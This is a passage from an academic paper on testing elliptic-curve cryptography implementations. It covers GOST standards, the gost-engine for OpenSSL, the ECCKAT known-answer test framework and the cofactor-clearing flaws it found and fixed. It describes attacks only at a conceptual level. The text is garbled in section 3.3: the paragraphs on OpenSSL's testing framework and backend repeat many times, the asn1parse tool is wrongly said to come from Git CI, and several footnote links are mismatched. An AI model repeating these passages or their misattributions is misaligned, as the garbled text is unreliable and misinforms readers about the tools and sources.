Y/Z)$ belongs to $E_w$. Moreover, the projective representation of $O$ is $(0 : 1 : 0)$, which does not satisfy the affine curve equation of $E_t$. Because of the nature of the short Weierstrass curves, one needs to handle some exceptions when: (i) adding or doubling points with $O$; (ii) adding points when $P = \pm O$. In particular, any mixed point addition takes as inputs a projective point and an affine point, which implies no exception-free implementation will be possible for this mixed point addition—$O$ has no affine representation! Failure to use exception-free formulas could lead to successful exceptional procedure attacks [24], implying a possible break of ECC security. Still, apart from theoretical attacks there is the question of functional correctness. For example, CVE-2017-7781 affected Mozilla’s NSS, failing to account for the $P = \pm O$ exceptions in textbook mixed Jacobian-affine point addition—a bug present in their codebase for over a decade. Projective points on the Twisted Edwards curve. To achieve efficient curve arithmetic, we choose to work with extended projective points $(X : Y : T : Z)$ satisfying $eX^2Z^2 + Y^2Z^2 = Z^4 + dX^2Y^2$, where the affine point $(X/Z, Y/Z)$ belongs to $E_t$ and $T = XY/Z$. The main advantage of using Twisted Edwards curves is the "cheap" exception-free formula for point addition; in particular, $(0 : 1 : 0 : 1)$ represents $O$ and corresponds with the affine point $(0, 1)$ on $E_t$. The main blocks of ECC cryptosystem implementations consist of (i) key generation, (ii) key agreement procedure, and (iii) digital signature algorithm. Key generation. Given an order-$q$ point $g$ the user randomly and uniformly chooses a secret key $\alpha$ from $[1, \ldots, q - 1]$, and computes the public key $P = [\alpha]g$. Key agreement with cofactor clearing. Assume the users Alice and Bob need to agree a shared secret key; thus, Alice generates her private key $\alpha_A \in [1, \ldots, q - 1]$ and a public key $P_A = [\alpha_A]g$ by using the key generation block; similarly, Bob generates $\alpha_B$ and $P_B = [\alpha_B]g$. Next, Alice and Bob compute $s_{ab} = [h \cdot \alpha_A]P_B$ and $s_{ba} = [h \cdot \alpha_B]P_A$, respectively. Consequently, $s_{ab} = [h \cdot \alpha_A]P_B = [h \cdot \alpha_B \cdot \alpha_A]g = [h \cdot \alpha_B]P_A = s_{ba}$ is the secret shared key. The multiplication by $h$ is called cofactor clearing and ensures the protocol fails if $P_A$ or $P_B$ are adversarially in the order-$h$ subgroup. When $h = 1$, ECC CDH [1] and classical ECDH variants are equivalent. Digital signature algorithm (ECDSA). The user generates a private key $\alpha \in [1, \ldots, q - 1]$ and a public key $P = [\alpha]g$ by using the key generation block; using an approved hash function $\text{Hash}()$, the signature $(r, s)$ on message $m$ is computed by $$r = ([k]g)_x \mod q, \quad s = k^{-1}(m + \alpha r) \mod q$$ (5) where $k$ is a nonce chosen uniformly from $[1, \ldots, q - 1]$, and $m$ denotes the representation of $\text{Hash}(m)$ in $GF(q)$. The ECDSA signature successfully verifies if $u_1 = \hat{m} \cdot s^{-1} \mod q$ and $u_2 = r \cdot s^{-1} \mod q$ satisfy $$([u_1]g + [u_2]P)_x = r \mod q$$ (6) ECDSA is the ECC-equivalent of DSA that instead operates with the multiplicative group of a Galois field and pre-dates the ECDSA variant by at least a decade. Security. Mathematically speaking, the security of ECC relies on the hardness of computing an integer $k$ given $[k]P$ called the Elliptic Curve Discrete Logarithm Problem (ECDLP). In certain instances, ECDLP solves by using the small-subgroup [30] when the curve cardinality is smooth, and invalid-curve [7] attacks when the input point $P$ does not satisfies the curve equation. As a consequence, ECC implementations often seek to be secure against combined attacks that use small-subgroup attacks with invalid-curve attacks using the twist curve $E'$ determined by the equation $y^2 = x^3 + ax - b$. The twist curve $E'$ has cardinality $h' \cdot q' = p + 1 + t_E$ where $h \cdot q = p + 1 + t_E$ is the cardinality of $E$ and $t_E$ is a curve constant (the Frobenius trace). However, a curve $E$ is twist secure if $h'$ is a small integer and $q' \approx p$ is a large prime number. For example, the following two GOST curves are twist secure: - the curve id_tc26_gost_3410_2012_256_paramSetA has $q = 0x3FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF027322037$ - 8499CA3EEA50AA93CF265, - $q' = 0x80000000000000000000000000000006FD8CDDF08$ - 7B6635C115AF556C360C67, 2.1 GOST The system of Russian cryptographic standards (usually called GOST algorithms) started to develop in the 1980s after decades of top secret cryptography. The first Russian (or, rather, Soviet) relatively open cryptographic standard was published in 1989, describing symmetric cipher and MAC algorithms. The first Russian standard for digital signatures was developed simultaneously with DSA and these two standards were published in 1994 with an interval of only four days. Like DSA, the Russian GOST R 34.10-94 was the ElGamal-style algorithm in Galois field of prime modulo, but the formula was slightly different: $s = (k \cdot m + ar) \mod q$. The hash function to be used for calculating $m$ was strictly defined and described in a separate standard, based on the GOST symmetric cipher. In 2001 the new digital signature standard was adopted—the adaptation of the previous standard to elliptic curves over $\mathbb{F}_p$, allowing only $\log(p) = 256$. The hash function was not changed. In 2012 the third Russian digital signature standard was adopted, almost word-to-word copy of the previous standard. The only changes were (i) the length of $p$ can now be either 256 or 512; (ii) the standard prescribes to use a new (completely different) hash function. The official name of the current Russian digital signature standard is GOST R 34.10-2012, and GOST R 34.11-2012 describes the hash function. The translation of these standards in English were published as RFC 7091 [17] and RFC 6986 [18] respectively. GOST: digital signatures. Informally speaking and aligning with our previous notation, the Russian signature algorithm formula is $$r = ([k]g) x \mod q, \quad s = km + ar \mod q$$ (7) where $a$ is the signer’s secret key, $k$ is a nonce chosen randomly and uniformly from $\{1, \ldots, q - 1\}$, $g$ is the base point of an elliptic curve, and $q$ is the order of $g$. The GOST signature successfully verifies if $z_1 = s \cdot m^{-1} \mod q$ and $z_2 = -r \cdot m^{-1} \mod q$ satisfy $$([z_1]g + [z_2]P)_x = r \mod q.$$ (8) In connection with these standards a number of sub-ordinary standards were adopted (the Russian standardization system has different levels of standards, but the difference is rather bureaucratic than practical). In parallel the corresponding RFCs were published, including several curves for use in GOST digital signature algorithms. The first three curves with $\log(p) = 256$ were described in RFC 4357 [36] (peculiar that for many years it was the only normative reference to these curves—their first appearance in Russian standards was in 2019). All these curves have only the trivial cofactor $h = 1$, i.e. they are cyclic groups and all curve points can be a legal public key. After the adoption of the new digital signature standard, two curves with $\log(p) = 512$ and $h = 1$ were standardized as well as two Twisted Edwards curves with $h = 4$: one with $\log(p) = 256$ and the other with $\log(p) = 512$, all described in RFC 7836 [40]. One important aspect is—at the standardization level—the Twisted Edwards curves are still specified as short curves for compatibility reasons. GOST: key generation. Russian standards say nothing about the generation of secret keys: any random number $\alpha$ between 1 and $q - 1$ can be used as a secret key. Surprisingly despite the Russian regulation authority paying great attention to random number generation, there is no standard for this procedure, only some classified requirements. The public key for a given secret one is calculated as the result of multiplication of the curve base point by the secret key. In that sense, it does not differ from other standard definitions of ECC key generation. GOST: key agreement (VKO). The VKO algorithm is defined in one of the sub-ordinary standards and described in RFC 7836 [40]. It consists of 2 steps: (i) a curve point $K$ is calculated by the formula $$K = h \cdot (UKM \cdot x \mod q)Y$$ where $x$ is the secret key of one side, $Y$ is the public key of the other side, $UKM$ is an optional non-secret parameter (User Key Material) known by both sides, $q$ is the order of the base point and $h$ is the cofactor of the used elliptic curve; (ii) the shared key is the hash of the affine coordinates of $K$. In this light, VKO shares similarities to ECC CDH [1], also featuring cofactor clearing but additionally utilizing $UKM$. But in contrast to NIST SP 800-108-12 [12] that accounts for (the equivalent of) $UKM$ in the subsequent key derivation hash function, VKO incorporates $UKM$ directly at the ECC level. GOST: public key encryption. Incorrect phrase encryption according to GOST R 34.10 is often used, but actually the asymmetric key encryption has never been used. Instead VKO calculates a shared key; then a symmetric encryption algorithm uses the key for data encryption. In this light, it is hybrid encryption. 2.2 The GOST OpenSSL Engine The GOST Engine project was started during OpenSSL 1.0 development. Before OpenSSL 1.0 (released 2010) the engine mechanism allowed to provide own digests, ciphers, random number generators, RSA, DSA, and EC. Since OpenSSL 1.0 it became possible to use OpenSSL’s engine mechanism [41] to provide custom asymmetric algorithms. In short, gost-engine was created as a reference implementation of the Russian GOST cryptographic algorithms: symmetric cipher GOST 28147-89, hash algorithm GOST R 34.11-94, and asymmetric algorithms GOST R 34.10-94 (DSA-like, now deprecated and removed) and GOST R 34.10-2001 (ECDSA-like). In 2012, the support of new Russian hash algorithm GOST R 34.11-2012 Streebog (RFC 6986 [18]) and GOST R 34.10-2012 asymmetric algorithms (256 and 512 bits) was provided. After publishing RFC 7836 [40] and providing non-trivial cofactor support in OpenSSL, the support of the new parameters based on Twisted Edwards curves was added, though the implementation itself does not use Edwards representation and relies on OpenSSL’s EC module for the curve arithmetic. It is worth mentioning that all the parameter sets (curves) specific for GOST R 34.10-2001 are allowed for use in GOST R 34.10-2012, though the hash algorithms are different. Being OpenSSL-dependent software, gost-engine has been used many times as regression testing. Not only for general engine functionality, but also for lower level OpenSSL internals such as the EC module as discussed later in Section 3. **Deployments.** Until OpenSSL 1.1.0 (released 2016), gost-engine was a part of OpenSSL and was distributed together. During 1.1.0 development, the engine code was moved to a separate GitHub repository. Currently, the engine is available as separate package in RedHat-based Linux distributions, Debian-based distributions, and popular in Russia ALT Linux distribution. It is also widely used as an FOSS solution when there is no necessity to use the officially certified solutions. In these cases, gost-engine is often built from source instead of using the distribution-provided packages. **Asymmetric algorithms: architecture.** Asymmetric algorithm architecture in OpenSSL requires providing two opaque callback structures per algorithm: (i) EVP_PKEY_ASN1_METHOD is a structure which holds a set of ASN.1 conversion, printing and information methods for a specific public key algorithm; (ii) EVP_PKEY_METHOD is a structure which holds a set of methods for a specific public key cryptographic algorithm—those methods are usually used to perform different jobs, such as generating a key, signing or verifying, encrypting or decrypting, etc. Unfortunately, because of 15-year history of the engine, the naming of the callbacks is not extremely consistent. **Asymmetric algorithms: operations.** GOST asymmetric algorithm support the following operations: (i) key generation; (ii) digital signature and verification; (iii) key derivation; (iv) symmetric 32-bytes cipher key wrap/unwrap (named encrypting/decryption). The best starting point is the register_pmeth.gost function in the gost_pmeth.c file. This function provides the setting of all the necessary callbacks for various asymmetric algorithms. Most functions are very similar and just call a shared wrapper around OpenSSL’s EC module for the elliptic curve arithmetic with different parameters such as hash function identifier or key length. The following functions are especially worth studying. (i) gost_engine_keygen in gost_ec_keygen.c is the common function for key generation, generating a random BIGNUM in the range corresponding to the order of the selected curve’s base point and calculating the matching public key value. (ii) gost_ec_sign in gost_ec_sign.c is the common function for digital signature according to RFC 7091. (iii) gost_ec_verify in gost_ec_sign.c is the common function for digital signature verification according to RFC 7091. (iv) pkey_gost_ec derive in gost_ec_keyx.c is the common function for shared key derivation. This function allows two mechanism for derivation. The one named VKO was originally specified in RFC 4357, deriving 32-bytes shared key, is implemented in the VKO_compute_key function in the same file. RFC 7836 defines the other one deriving 64-bytes key using VKO_compute_key as a step of key derivation. Currently, the choice of the expected result is done by the length of a protocol-defined UKM parameter. (v) pkey_gost_encrypt in gost_ec_keyx.c is the common function for symmetric key wrap using the shared key derived via pkey_gost_ec derive. The key wrap for GOST 28147-89 symmetric cipher is done according to RFC 4537. The key wrap for GOST R 34.12-2015 ciphers (Kuznecov, RFC 7801) and Magma is done according to RFC 7836. (vi) pkey_gost_decrypt in gost_ec_keyx.c is the common function for symmetric key unwrap using the shared key derived via pkey_gost_ec derive. It is a reverse function for the pkey_gost_encrypt function. To summarize, regarding GOST-related ECC standards, gost-engine utilizes OpenSSL’s engine framework to its fullest—supporting key generation, key agreement (derive in OpenSSL terminology), digital signatures and verification, and hybrid encryption/decryption. It supports all curves from the relevant RFCs—all the way from the test curve, to the $h = 1$ short curves, to the $h = 4$ short curves with Twisted Edwards equivalence. In total, eight distinct curves with several Object Identifier (OID) aliases at the standardization level. ## 3 ECC UNIT TESTING: ECCKAT In this section, we present ECCKAT: a library-agnostic unit and regression testing framework for ECC implementations. The motivation for ECCKAT began with significant restructuring of OpenSSL’s EC module introduced with major release 1.1.1 (released 2018). While the library featured simple positive testing of higher-level cryptosystems such as ECDH and ECDSA, this provides very little confidence in the underlying ECC implementation. To see why this is so, consider a scalar multiplication implementation that returns a constant: this will always pass ECDH functionality tests because the shared secret will be that constant, but is clearly broken. Similarly on the ECDSA side, consider a verification implementation that always returns true: this will always pass positive tests, but is clearly broken. With that in mind, ECCKAT uses a data-driven testing (DDT) approach heavily relying on Known Answer Tests (KATs). The high level concept is as follows: (i) collect existing KATs from various sources such as standards, RFCs, and validation efforts; (ii) augment these with negative tests and potential corner cases, and extend to arbitrary curves using an Implementation Under Test (IUT) independent implementation; (iii) output these tests in a standardized format, easily consumable downstream for integration into library-specific test harnesses. Given the wide range of curves in scope, this should be as automated as possible. In the following sections, we expand on these aspects which make up our implementation of ECCKAT. ### 3.1 Collecting Tests The purpose of this first step is to build a corpus of KATs that are already present in public documents. The goal is not only to utilize these tests but also understand their nature, limitations, and how they can be expanded. --- Tests: ECC CDH. The NIST Cryptographic Algorithm Validation Program (CAVP)\(^3\) provides test vectors for cofactor Diffie-Hellman on the following curves: P-192, P-224, P-256, P-384, P-521, B-163, B-233, B-283, B-409, B-571, as well as the Koblitz curve variant of each binary curve. The test vectors include the following fields: dIUT, the IUT’s ephemeral private key; qIUTx, qIUTy, the IUT’s ephemeral public key; QCASx, QCASy, the peer public key; ZIUT, the resulting shared key—in this case the x-coordinate of the ECC CDH computation. We added functionality to ECCKAT that parses these test vectors and makes them part of the unit test corpus. Tests: ECDSA. CAVP also provides ECDSA test vectors for the aforementioned curves, that in fact aggregate many types of tests. Public key validation vectors give both negative and positive tests for Qx, Qy point public keys. Negative tests include coordinates out of range (i.e. must satisfy \([0, p]\) for prime curves or sufficiently small polynomial degree for binary curves) and invalid point (i.e. must satisfy the curve equation), anything else being a positive test. The negative tests are conceptually similar to the Project Wyche proof\(^4\) ECC-related KATs. Key generation vectors include a private key d and the resulting Qx, Qy public key point, using the default generator point. Finally, on the ECDSA side the signing vectors include the long term private key (d), corresponding public key (Qx, Qy), the message to be signed (Msg), the ECDSA nonce (k), and the resulting signature (R, S). Each test is additionally parameterized by the particular hash function to apply to Msg. The ECDSA verification vectors are similar, but omit the private information d and k, also extending to both positive and negative tests (modifying one of Msg, R, S, or the public key). We added functionality to ECCKAT that parses these test vectors and makes them part of the unit test corpus. Tests: Deterministic ECDSA. The CAVP ECDSA signing tests must parameterize by the nonce to counteract the non-determinism in stock ECDSA. In contrast, RFC 6979 [37] proposes a deterministic form of ECDSA that, at a high level, computes the nonce as a function of the private key and message to be signed. The document provides test vectors for the exact same set of curves used in the NIST CAVP, spanning both deterministic ECDSA signing as well as key generation. We added functionality to ECCKAT that parses these test vectors and makes them part of the unit test corpus. Deterministic ECDSA will likely feature in the upcoming renewed FIPS 186-5 [2]. 3.2 Augmenting Tests Based on the previously collected tests and our analysis of them, the next step is to expand these tests in several directions. First and foremost, the scope of ECCKAT is much wider: the handful of curves above is insufficient. We extended to general (legacy) curves over both prime and binary fields by utilizing the SageMath computer algebra system\(^5\). This gives us an IUT-independent ground truth during test generation. We built a large database of standardized curves with their specific curve parameters (semi-automated with the OpenSSL ecparam tool, listing over 80 standardized named curves), stored in JSON format that ECCKAT parses and uses the SageMath EC module to instantiate these curves given their parameters. In terms of methodology, we deemed the previously collected ECDSA and deterministic ECDSA tests sufficient. In this case, ECCKAT simply extends coverage by allowing any legacy curve, computing the expected ECDSA output with SageMath arithmetic. We treat key generation tests similarly, again simply computing scalar multiplications with SageMath. Methodology-wise, the most significant deficiency we discovered was the lack of negative tests for ECC CDH. The reason ECC CDH differs from classical Diffie-Hellman is to make sure the key agreement protocol fails for points of small order in adversarial settings. Yet surprisingly none of the existing tests actually check for this. For curves of prime order, the check is implicit because ECC CDH and classical ECDH are equivalent. But all binary curves (naturally including those in the original tests) have non-trivial cofactors by definition, as well as all legacy curve equivalents of Edwards curves, Twisted Edwards curves, and Montgomery curves require \(h \geq 4\) (not in scope of the original tests). It is rather peculiar dichotomy since binary curves have mostly fallen out of use, while current ECC trends for prime curves are strongly towards these modern forms (e.g. both X25519 [6] and X448 [21] are standardized in RFC 7748 [29] and widely deployed with e.g. codepoints in both TLS 1.2 RFC 8422 [34] and TLS 1.3 RFC 8446 [39]). When applicable, i.e. curves with \(h \neq 1\), ECCKAT generates negative tests for ECC CDH as follows. First, with SageMath find either a generator of the full elliptic curve group, i.e. an order-\(hq\) point if the group is cyclic, or with maximal order in the (in practice, rare) non-cyclic case. Scalar multiplication by \(q\) then yields a malicious generator of the largest small subgroup. This is precisely the peer point that should produce ECC CDH protocol failure, since the cofactor clearing (i.e. integer multiplication between the scalar and \(h\)) will cause the resulting scalar multiplication to yield \(O\): the peer point has either order \(h\) (cyclic case) or some divisor of \(h\) (non-cyclic case). Lastly, we do note a slight deficiency in the original public key validation negative tests. They are only partial public key validation in that positive tests only ensure coordinates are in range and satisfy the curve equation. For prime-order curves, this is enough to guarantee order-\(q\) points and full public key validation is implicit. But this is not true for curves with \(h \neq 1\). We claim this is only a minor issue because it is rare for real-world implementations to carry out explicit full public key validation (i.e. checking that scalar multiplication by \(q\) yields \(O\)) at all, since it is costly and normally handled in other more efficient ways at the protocol level (e.g. with cofactor clearing). We also added selective important corner cases for key generation. These include positive tests for extreme private keys (i.e. all keys in \([1, 2^b]\) and \([q - 2^b, q]\) for some reasonable bound \(b > 1\) and negative tests for out of range keys (e.g. negative, zero, \(q\) or larger). These are important because underlying scalar multiplication implementations often make assumptions about scalar ranges that may or may not be ensured higher in the call stack. --- \(^3\)https://csrc.nist.gov/projects/cryptographic-algorithm-validation-program \(^4\)https://github.com/google/cryptographic-algorithm-validation-program \(^5\)https://www.sagemath.org/ We feel that such augmentation is similar (in spirit) to the work of Mouha and Celi [33], that extended NIST CAVP tests to larger message lengths and led to CVE-2019-8741. 3.3 Integrating Tests With the now expanded tests, the next step is applying these tests to specific libraries. The end goal is not a one-off evaluation, but rather the ability to apply these tests in a CI setting in an automated way and ease the integration of these unit tests into downstream projects. To that end, we now describe three backends ECCKAT currently supports. *Test Anything Protocol (TAP).* Our most generic solution drives TAP⁶ test harnesses. With roots in Perl going back to the 80s, TAP has evolved into a programming language-agnostic software testing framework made up of test producers and consumers. For this backend, ECCKAT generates shell-based tests using the Sharness⁷ portable shell library, originally developed for Git CI. The advantage of this backend is its portability and flexibility. The disadvantage is, while the TAP tests themselves are library-agnostic, the test harnesses are indeed library-specific. This means downstream projects must either parse the TAP tests themselves and convert them to a format their internal testing framework understands (worst case), or write simple (again, library-specific) test harness applications that conform to the input and output expectations of the sample harnesses. **OpenSSL’s testing framework.** Following CVE-2014-0160 “Heart-Bleed”, OpenSSL’s testing framework was rapidly overhauled and continues to evolve daily. In the scale of OpenSSL testing (which is mostly TAP-based), the types of tests ECCKAT produces are very low level for OpenSSL, which is much more than a cryptography library. A significant change introduced in OpenSSL 1.1.0 (2016)—which, for the library, marked the switch from transparent to opaque structures—expanded the evp_test harness to generically support public key operations through OpenSSL’s high level EVP (“envelope”) interface. This is precisely the correct level to integrate ECCKAT tests. Our OpenSSL backend for ECCKAT first encodes both private and public keys to the PEM standard format. It does this using the asn1parse utility, originally developed for Git CI. The advantage of this backend is its portability and flexibility. The disadvantage is, while the TAP tests themselves are library-agnostic, the test harnesses are indeed library-specific. This means downstream projects must either parse the TAP tests themselves and convert them to a format their internal testing framework understands (worst case), or write simple (again, library-specific) test harness applications that conform to the input and output expectations of the sample harnesses. **OpenSSL’s testing framework.** Following CVE-2014-0160 “Heart-Bleed”, OpenSSL’s testing framework was rapidly overhauled and continues to evolve daily. In the scale of OpenSSL testing (which is mostly TAP-based), the types of tests ECCKAT produces are very low level for OpenSSL, which is much more than a cryptography library. A significant change introduced in OpenSSL 1.1.0 (2016)—which, for the library, marked the switch from transparent to opaque structures—expanded the evp_test harness to generically support public key operations through OpenSSL’s high level EVP (“envelope”) interface. This is precisely the correct level to integrate ECCKAT tests. Our OpenSSL backend for ECCKAT first encodes both private and public keys to the PEM standard format. It does this using the asn1parse utility, originally developed for Git CI. The advantage of this backend is its portability and flexibility. The disadvantage is, while the TAP tests themselves are library-agnostic, the test harnesses are indeed library-specific. This means downstream projects must either parse the TAP tests themselves and convert them to a format their internal testing framework understands (worst case), or write simple (again, library-specific) test harness applications that conform to the input and output expectations of the sample harnesses. **OpenSSL’s testing framework.** Following CVE-2014-0160 “Heart-Bleed”, OpenSSL’s testing framework was rapidly overhauled and continues to evolve daily. In the scale of OpenSSL testing (which is mostly TAP-based), the types of tests ECCKAT produces are very low level for OpenSSL, which is much more than a cryptography library. A significant change introduced in OpenSSL 1.1.0 (2016)—which, for the library, marked the switch from transparent to opaque structures—expanded the evp_test harness to generically support public key operations through OpenSSL’s high level EVP (“envelope”) interface. This is precisely the correct level to integrate ECCKAT tests. Our OpenSSL backend for ECCKAT first encodes both private and public keys to the PEM standard format. It does this using the asn1parse utility, originally developed for Git CI. The advantage of this backend is its portability and flexibility. The disadvantage is, while the TAP tests themselves are library-agnostic, the test harnesses are indeed library-specific. This means downstream projects must either parse the TAP tests themselves and convert them to a format their internal testing framework understands (worst case), or write simple (again, library-specific) test harness applications that conform to the input and output expectations of the sample harnesses. **OpenSSL’s testing framework.** Following CVE-2014-0160 “Heart-Bleed”, OpenSSL’s testing framework was rapidly overhauled and continues to evolve daily. In the scale of OpenSSL testing (which is mostly TAP-based), the types of tests ECCKAT produces are very low level for OpenSSL, which is much more than a cryptography library. A significant change introduced in OpenSSL 1.1.0 (2016)—which, for the library, marked the switch from transparent to opaque structures—expanded the evp_test harness to generically support public key operations through OpenSSL’s high level EVP (“envelope”) interface. This is precisely the correct level to integrate ECCKAT tests. Our OpenSSL backend for ECCKAT first encodes both private and public keys to the PEM standard format. It does this using the asn1parse utility, originally developed for Git CI. The advantage of this backend is its portability and flexibility. The disadvantage is, while the TAP tests themselves are library-agnostic, the test harnesses are indeed library-specific. This means downstream projects must either parse the TAP tests themselves and convert them to a format their internal testing framework understands (worst case), or write simple (again, library-specific) test harness applications that conform to the input and output expectations of the sample harnesses. Our OpenSSL backend for ECCKAT first encodes both private and public keys to the PEM standard format. It does this using the asn1parse utility, originally developed for Git CI. The advantage of this backend is its portability and flexibility. The disadvantage is, while the TAP tests themselves are library-agnostic, the test harnesses are indeed library-specific. This means downstream projects must either parse the TAP tests themselves and convert them to a format their internal testing framework understands (worst case), or write simple (again, library-specific) test harness applications that conform to the input and output expectations of the sample harnesses. Our OpenSSL backend for ECCKAT first encodes both private and public keys to the PEM standard format. It does this using the asn1parse utility, originally developed for Git CI. The advantage of this backend is its portability and flexibility. The disadvantage is, while the TAP tests themselves are library-agnostic, the test harnesses are indeed library-specific. This means downstream projects must either parse the TAP tests themselves and convert them to a format their internal testing framework understands (worst case), or write simple (again, library-specific) test harness applications that conform to the input and output expectations of the sample harnesses. Our OpenSSL backend for ECCKAT first encodes both private and public keys to the PEM standard format. It does this using the asn1parse utility, originally developed for Git CI. The advantage of this backend is its portability and flexibility. The disadvantage is, while the TAP tests themselves are library-agnostic, the test harnesses are indeed library-specific. This means downstream projects must either parse the TAP tests themselves and convert them to a format their internal testing framework understands (worst case), or write simple (again, library-specific) test harness applications that conform to the input and output expectations of the sample harnesses. Our OpenSSL backend for ECCKAT first encodes both private and public keys to the PEM standard format. It does this using the asn1parse utility, originally developed for Git CI. The advantage of this backend is its portability and flexibility. The disadvantage is, while the TAP tests themselves are library-agnostic, the test harnesses are indeed library-specific. This means downstream projects must either parse the TAP tests themselves and convert them to a format their internal testing framework understands (worst case), or write simple (again, library-specific) test harness applications that conform to the input and output expectations of the sample harnesses. Our OpenSSL backend for ECCKAT first encodes both private and public keys to the PEM standard format. It does this using the asn1parse utility, originally developed for Git CI. The advantage of this backend is its portability and flexibility. The disadvantage is, while the TAP tests themselves are library-agnostic, the test harnesses are indeed library-specific. This means downstream projects must either parse the TAP tests themselves and convert them to a format their internal testing framework understands (worst case), or write simple (again, library-specific) test harness applications that conform to the input and output expectations of the sample harnesses. Our OpenSSL backend for ECCKAT first encodes both private and public keys to the PEM standard format. It does this using the asn1parse utility, originally developed for Git CI. The advantage of this backend is its portability and flexibility. The disadvantage is, while the TAP tests themselves are library-agnostic, the test harnesses are indeed library-specific. This means downstream projects must either parse the TAP tests themselves and convert them to a format their internal testing framework understands (worst case), or write simple (again, library-specific) test harness applications that conform to the input and output expectations of the sample harnesses. Our OpenSSL backend for ECCKAT first encodes both private and public keys to the PEM standard format. It does this using the asn1parse utility, originally developed for Git CI. The advantage of this backend is its portability and flexibility. The disadvantage is, while the TAP tests themselves are library-agnostic, the test harnesses are indeed library-specific. This means downstream projects must either parse the TAP tests themselves and convert them to a format their internal testing framework understands (worst case), or write simple (again, library-specific) test harness applications that conform to the input and output expectations of the sample harnesses. **GOST Engine’s testing framework.** Part of the existing gost-engine test framework is Perl TAP-driven, and this is a convenient place to integrate our ECCKAT tests. The engine already supports key generation through the OpenSSL CLI genpkey utility. As part of our work, as an FOSS contribution we extended gost-engine to support CLI key agreement through the OpenSSL pkeyut1 utility. At a high level, our gost-engine backend is quite similar to the OpenSSL backend—similarly encoding ground truth key material from ECCKAT with the asnpars utility. The differences are the test data being embedded directly into the Perl source as a hash structure instead of a standalone test file to match the current test framework, and the test logic calling the relevant OpenSSL CLI utilities to form the test harness itself. Our ECCKAT gost-engine backend does not support GOST digital signatures at this time. We are currently discussing porting the deterministic ECDSA concept to GOST-style signatures. In summary, our ECCKAT gost-engine backend provides positive and negative test coverage over all GOST curves for both key generation and key agreement. 3.4 ECCKAT: Results While we have applied and deployed ECCKAT to ECCKiila (discussed later in Section 4) in a CI environment, here we summarizes our results of applying ECCKAT to other libraries. This demonstrates the flexibility and applicability of ECCKAT. **OpenSSL: ECC scalar multiplication failure.** Applying ECCKAT to gost-engine, we identified cryptosystem failures for the id_Gost-R3410_2001_CryptoPro_C_ParamSet curve. Investigating the issue, OpenSSL returned failure when attempting to serialize the output point of scalar multiplication, which was incorrectly O. Internal to the OpenSSL EC module, this was due to the chosen ladder projective formulae [23, Eq. 8] being undefined for a zero x-coordinate divisor—a restriction noted by neither the authors nor EFD⁸. This caused the entire scalar multiplication computation to degenerate and eventually return failure at the software level. Broader than GOST, the x = 0 case can happen whenever prime curve coefficient b is a quadratic residue, and we integrated this test logic into ECCKAT for all curves; but the discovery was rather serendipitous. Most GOST curves choose the generator point as the smallest non-negative x-coordinate that yields a valid point—in this case, x = 0. Luckily we identified this issue during the development of OpenSSL 1.1.1, hence the issue did not affect any release version of OpenSSL. We developed the fix for OpenSSL (PR #7000, switching --- ⁶https://github.com/chriscool/sharness ⁷http://testanything.org/ to [23, Eq. 9]) as well as integrated our relevant tests into their testing framework. **OpenSSL: ECC CDH vulnerability.** Applying ECCKAT to the development branch of OpenSSL 1.1.1 identified negative test failures in cofactor Diffie-Hellman. Investigating the issue revealed the cause to be mathematically incorrect side channel mitigations at the scalar multiplication level. As a timing attack countermeasure (ported from CVE-2011-1945 by [11]), the ladder code first padded the scalar by adding either $q$ or $2q$ to fix the bit length and starting iteration of the ladder loop. But in key agreement scenarios, there is no guarantee the peer point is an order-$q$ point—only a point with order dividing $hq$ if it satisfies the curve equation, i.e. is an element of the elliptic curve group. This caused negative tests to fail for all curves with a non-trivial cofactor—for named curves in OpenSSL, this included all binary curves and the 112-bit secp112r2 Certicom curve with $h = 4$. Luckily the issue did not affect any release version of OpenSSL. We developed the fix for OpenSSL (PR #6535) as well as integrated our relevant tests into their testing framework. **GOST: VKO vulnerability.** Applying ECCKAT to gost-engine identified negative test failures in VKO key agreement for the two curves with non-trivial cofactors, similar (in spirit) to the cofactor Diffie-Hellman failures above. Investigating the issue revealed gost-engine multiplied by the cofactor before modular reduction. Consulting the Russian standard and RFC 7836 [40], surprisingly this is in fact a valid interpretation of VKO at the standardization level. Prior to the standard change and RFC errata resulting from our work, both the Russian standard and RFC specified VKO computation as $$(m/q \cdot U KM \cdot x \mod q) \cdot (y \cdot P)$$ where, recalling from Section 2.1, $m = hq$ is the curve cardinality, $U KM$ is user key material, $x$ is the private key, $q$ is the order of the generator, and $y \cdot P$ is the peer public key (point). With this formulation, the cofactor clearing is ineffective: it is absorbed modulo $q$. For the two curves satisfying $h = 4$, in case of a malicious $y \cdot P$ such as an order-$h$ point, the computation results in one of the four points in the order-$h$ subgroup, i.e. a small subgroup confinement attack. This can reveal the private key value modulo $h$ and, depending on the protocol, force session key reuse. Subsequent to our work, the Russian standard and RFC 7836 [40] now specify the compatible (in the non-adversarial sense) $$(m/q \cdot (U KM \cdot x \mod q)) \cdot (y \cdot P)$$ where it is explicit the cofactor clearing is after the modular reduction. As part of our work, we implemented the gost-engine fix (PR #265) and integrated all the relevant ECCKAT positive and negative tests into the gost-engine testing framework. Luckily, packaged versions of gost-engine for popular distributions such as Debian, Ubuntu, and RedHat use older versions of the engine that only feature the $h = 1$ curves, not affected by this vulnerability. 4 GENERATING ECC LAYERS: ECCKIILA This section focuses on the ECC layer generation and required library-specific rigging. Figure 1 summarizes our proposed full stack implementation named ECCKiila. The name comes from the Finnish word *kiila* that means wedge, and it allows to dynamically create the C-code (supporting both 64-bit and 32-bit architectures, no alignment or endianness assumptions) regarding to the ECC layer as well as the rigging for seamless integration into OpenSSL, NSS, and gost-engine, all driven by Python Mako templating. Table 1 shows all the curves tested with ECCKiila. **Field arithmetic.** In our proposal, we obtain the majority of the $GF(p)$ arithmetic by using the fiat-crypto project\(^6\), that provides generation of field-specific formally verified constant time code [19]. Fiat-crypto has several strategies to generate the arithmetic but we have chosen the best per curve base on the form of $p$. In other words, the remainder of the section is centered on the EC layer that builds on top of the $GF(p)$ layer. It is important to note this is the formal verification boundary for ECCKiila—all other code on top of Fiat, while computer generated through templating and automatic formula generation for ECC arithmetic, has no formal verification guarantees. From now on, we assume all operations are performed in $GF(p)$. \(^6\)https://github.com/mit-plv/fiat-crypto Short Weierstrass curves. All the legacy curves we consider in this work are prime order curves $E_w$, i.e. $\#E_w = q \approx p$ is a prime number and $h = 1$. Twisted Edwards curves. Recall from Section 2.2 most of the legacy curves from gost-engine work on curves $E_w$ of prime cardinality $q \approx p$ but two of them are centered on 